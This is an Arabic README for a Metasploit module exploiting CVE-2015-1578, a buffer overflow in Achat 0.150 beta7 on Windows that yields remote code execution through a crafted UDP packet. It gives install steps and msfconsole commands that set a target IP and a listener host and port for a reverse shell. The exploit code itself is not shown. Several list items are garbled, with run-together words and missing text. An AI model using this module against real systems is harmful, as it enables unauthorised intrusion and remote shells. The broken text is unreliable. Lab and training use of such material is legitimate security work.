هذا هو استغلال وحدة Metasploit لإثبات المفهوم لثغرة CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على Windows. يؤدي الاستغلال إلى تنفيذ تعليمات برمجية عن بُعد عبر حزمة UDP مصمّمة خصيصًا.
هذه وحدة Metasploit لـ CVE-2015-1578، وهي ثغرة تجاوز سعة المخزن المؤقت في Achat 0.150 beta7 على ويندوز. يؤدي استغلالها إلى تنفيذ كود عن بُعد عبر حزمة UDP مخصصة.
صُممت هذه الوحدة لتكون مثالًا نظيفًا وبسيطًا ومنظمًا جيدًا لتطوير استغلالات Metasploit. توضح:
msfvenommsfvenom في $PATH الخاص بكmsfvenom لتوليد حمولة بترميز x86/unicode_mixed وأحرف محظورة مخصصة./install.sh
ثم شغّل Metasploit ونفّذ:
reload_all
use exploit/windows/yaldobaoth/achat_bof
الخيارات
RHOSTS – عنوان IP للهدف (مطلوب)LHOST – عنوان IP للمضيف المحلي للشل العكسي (مطلوب)LPORT – المنفذ المحلي للشل العكسي (الافتراضي: 4444)RPORT – منفذ UDP البعيد على الهدف (الافتراضي: 9256)مثال استخدام
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
سيؤدي هذا إلى:
LHOST:LPORT المحدد